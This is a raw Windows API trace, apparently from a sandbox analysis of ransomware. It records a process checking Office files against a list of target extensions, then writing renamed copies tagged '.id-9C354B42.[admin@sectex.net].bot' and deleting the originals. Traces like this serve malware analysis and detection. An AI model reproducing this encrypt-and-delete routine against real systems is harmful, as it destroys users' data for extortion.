	[0152.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0152.682] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visintl.dll.idx_dll")) returned 1
	[0152.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0152.682] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0152.682] lstrlenW (lpString=".doc") returned 4
	[0152.682] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0152.683] lstrlenW (lpString=".docx") returned 5
	[0152.683] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0152.683] lstrlenW (lpString=".pdf") returned 4
	[0152.683] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0152.683] lstrlenW (lpString=".xls") returned 4
	[0152.683] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0152.683] lstrlenW (lpString=".xlsx") returned 5
	[0152.683] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0152.683] lstrlenW (lpString=".ppt") returned 4
	[0152.683] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0152.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0152.683] lstrlenW (lpString=".zip") returned 4
	[0152.683] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0152.683] lstrlenW (lpString=".rar") returned 4
	[0152.683] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0152.683] lstrlenW (lpString=".bz2") returned 4
	[0152.683] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0152.683] lstrlenW (lpString=".7z") returned 3
	[0152.683] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0152.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0152.683] lstrlenW (lpString=".dbf") returned 4
	[0152.683] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0152.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0152.683] lstrlenW (lpString=".1cd") returned 4
	[0152.683] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0152.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0152.683] lstrlenW (lpString=".jpg") returned 4
	[0152.683] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0152.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0152.683] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0152.684] lstrlenW (lpString=".doc") returned 4
	[0152.684] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0152.684] lstrlenW (lpString=".docx") returned 5
	[0152.684] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0152.684] lstrlenW (lpString=".pdf") returned 4
	[0152.684] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0152.684] lstrlenW (lpString=".xls") returned 4
	[0152.684] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0152.684] lstrlenW (lpString=".xlsx") returned 5
	[0152.684] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0152.684] lstrlenW (lpString=".ppt") returned 4
	[0152.684] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0152.684] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0152.684] lstrlenW (lpString=".zip") returned 4
	[0152.684] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0152.684] lstrlenW (lpString=".rar") returned 4
	[0152.684] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0152.684] lstrlenW (lpString=".bz2") returned 4
	[0152.684] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0152.684] lstrlenW (lpString=".7z") returned 3
	[0153.160] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0153.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0153.160] lstrlenW (lpString=".dbf") returned 4
	[0153.160] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0153.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0153.161] lstrlenW (lpString=".1cd") returned 4
	[0153.161] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0153.161] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISINTL.DLL.IDX_DLL") returned 67
	[0153.163] lstrlenW (lpString=".jpg") returned 4
	[0153.164] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0153.166] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0153.169] lstrlenW (lpString="VISIO_STD_COL.HXT") returned 17
	[0153.169] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.294] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=209) returned 1
	[0153.294] CloseHandle (hObject=0x3b4) returned 1
	[0153.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxt")) returned 0x20
	[0153.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.295] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.295] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.295] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0153.295] GetLastError () returned 0x0
	[0153.295] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xd1, lpOverlapped=0x0) returned 1
	[0153.296] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0153.297] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.297] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0153.297] SetEndOfFile (hFile=0x3bc) returned 1
	[0153.297] CloseHandle (hObject=0x3bc) returned 1
	[0153.297] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.297] SetEndOfFile (hFile=0x3b4) returned 1
	[0153.303] CloseHandle (hObject=0x3b4) returned 1
	[0153.303] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.303] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_col.hxt")) returned 1
	[0153.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.304] lstrlenW (lpString=".doc") returned 4
	[0153.304] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.304] lstrlenW (lpString=".docx") returned 5
	[0153.304] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.304] lstrlenW (lpString=".pdf") returned 4
	[0153.304] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.304] lstrlenW (lpString=".xls") returned 4
	[0153.304] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.304] lstrlenW (lpString=".xlsx") returned 5
	[0153.304] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.304] lstrlenW (lpString=".ppt") returned 4
	[0153.304] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.305] lstrlenW (lpString=".zip") returned 4
	[0153.305] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.305] lstrlenW (lpString=".rar") returned 4
	[0153.305] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.305] lstrlenW (lpString=".bz2") returned 4
	[0153.305] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.305] lstrlenW (lpString=".7z") returned 3
	[0153.305] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.305] lstrlenW (lpString=".dbf") returned 4
	[0153.305] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.305] lstrlenW (lpString=".1cd") returned 4
	[0153.305] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.305] lstrlenW (lpString=".jpg") returned 4
	[0153.305] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.305] lstrlenW (lpString=".doc") returned 4
	[0153.305] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.305] lstrlenW (lpString=".docx") returned 5
	[0153.305] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.305] lstrlenW (lpString=".pdf") returned 4
	[0153.305] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.305] lstrlenW (lpString=".xls") returned 4
	[0153.305] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.305] lstrlenW (lpString=".xlsx") returned 5
	[0153.305] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.306] lstrlenW (lpString=".ppt") returned 4
	[0153.306] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.306] lstrlenW (lpString=".zip") returned 4
	[0153.306] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.306] lstrlenW (lpString=".rar") returned 4
	[0153.306] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.306] lstrlenW (lpString=".bz2") returned 4
	[0153.306] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.306] lstrlenW (lpString=".7z") returned 3
	[0153.306] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.306] lstrlenW (lpString=".dbf") returned 4
	[0153.306] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.306] lstrlenW (lpString=".1cd") returned 4
	[0153.306] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.306] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_COL.HXT") returned 65
	[0153.306] lstrlenW (lpString=".jpg") returned 4
	[0153.306] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.306] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.306] lstrlenW (lpString="VISIO_STD_K_COL.HXK") returned 19
	[0153.306] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.307] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=113) returned 1
	[0153.307] CloseHandle (hObject=0x3b4) returned 1
	[0153.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_k_col.hxk")) returned 0x20
	[0153.307] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.307] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.307] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.307] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0153.308] GetLastError () returned 0x0
	[0153.308] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x71, lpOverlapped=0x0) returned 1
	[0153.309] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0x80, lpOverlapped=0x0) returned 1
	[0153.310] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.310] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0153.310] SetEndOfFile (hFile=0x3bc) returned 1
	[0153.310] CloseHandle (hObject=0x3bc) returned 1
	[0153.310] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.310] SetEndOfFile (hFile=0x3b4) returned 1
	[0153.313] CloseHandle (hObject=0x3b4) returned 1
	[0153.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.313] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visio_std_k_col.hxk")) returned 1
	[0153.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.314] lstrlenW (lpString=".doc") returned 4
	[0153.314] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.314] lstrlenW (lpString=".docx") returned 5
	[0153.314] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.314] lstrlenW (lpString=".pdf") returned 4
	[0153.314] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.314] lstrlenW (lpString=".xls") returned 4
	[0153.314] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.314] lstrlenW (lpString=".xlsx") returned 5
	[0153.314] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.314] lstrlenW (lpString=".ppt") returned 4
	[0153.314] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.314] lstrlenW (lpString=".zip") returned 4
	[0153.314] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.314] lstrlenW (lpString=".rar") returned 4
	[0153.314] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.314] lstrlenW (lpString=".bz2") returned 4
	[0153.314] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.314] lstrlenW (lpString=".7z") returned 3
	[0153.314] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.314] lstrlenW (lpString=".dbf") returned 4
	[0153.314] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.314] lstrlenW (lpString=".1cd") returned 4
	[0153.314] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.315] lstrlenW (lpString=".jpg") returned 4
	[0153.315] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.315] lstrlenW (lpString=".doc") returned 4
	[0153.315] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.315] lstrlenW (lpString=".docx") returned 5
	[0153.315] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.315] lstrlenW (lpString=".pdf") returned 4
	[0153.315] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.315] lstrlenW (lpString=".xls") returned 4
	[0153.315] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.315] lstrlenW (lpString=".xlsx") returned 5
	[0153.315] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.315] lstrlenW (lpString=".ppt") returned 4
	[0153.315] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.315] lstrlenW (lpString=".zip") returned 4
	[0153.315] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.315] lstrlenW (lpString=".rar") returned 4
	[0153.315] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.315] lstrlenW (lpString=".bz2") returned 4
	[0153.315] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.315] lstrlenW (lpString=".7z") returned 3
	[0153.315] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.315] lstrlenW (lpString=".dbf") returned 4
	[0153.315] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.316] lstrlenW (lpString=".1cd") returned 4
	[0153.316] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISIO_STD_K_COL.HXK") returned 67
	[0153.316] lstrlenW (lpString=".jpg") returned 4
	[0153.316] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.316] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0153.316] lstrlenW (lpString="VISUTILS.VSL") returned 12
	[0153.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visutils.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.316] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0xad0ff1c | out: lpFileSize=0xad0ff1c*=50544) returned 1
	[0153.316] CloseHandle (hObject=0x3b4) returned 1
	[0153.316] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visutils.vsl")) returned 0x20
	[0153.317] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visutils.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visutils.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b4
	[0153.317] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.317] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.317] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\visutils.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0153.318] GetLastError () returned 0x0
	[0153.318] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0xc570, lpOverlapped=0x0) returned 1
	[0153.507] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xc580, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xc580, lpOverlapped=0x0) returned 1
	[0153.508] ReadFile (in: hFile=0x3b4, lpBuffer=0xb8a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xad0fed4, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesRead=0xad0fed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.509] WriteFile (in: hFile=0x3bc, lpBuffer=0xb8a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xad0fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb8a0020*, lpNumberOfBytesWritten=0xad0fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0153.509] SetEndOfFile (hFile=0x3bc) returned 1
	[0153.509] CloseHandle (hObject=0x3bc) returned 1
	[0153.509] SetFilePointerEx (in: hFile=0x3b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xad0fec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.509] SetEndOfFile (hFile=0x3b4) returned 1
	[0153.512] CloseHandle (hObject=0x3b4) returned 1
	[0153.512] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\VISUTILS.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
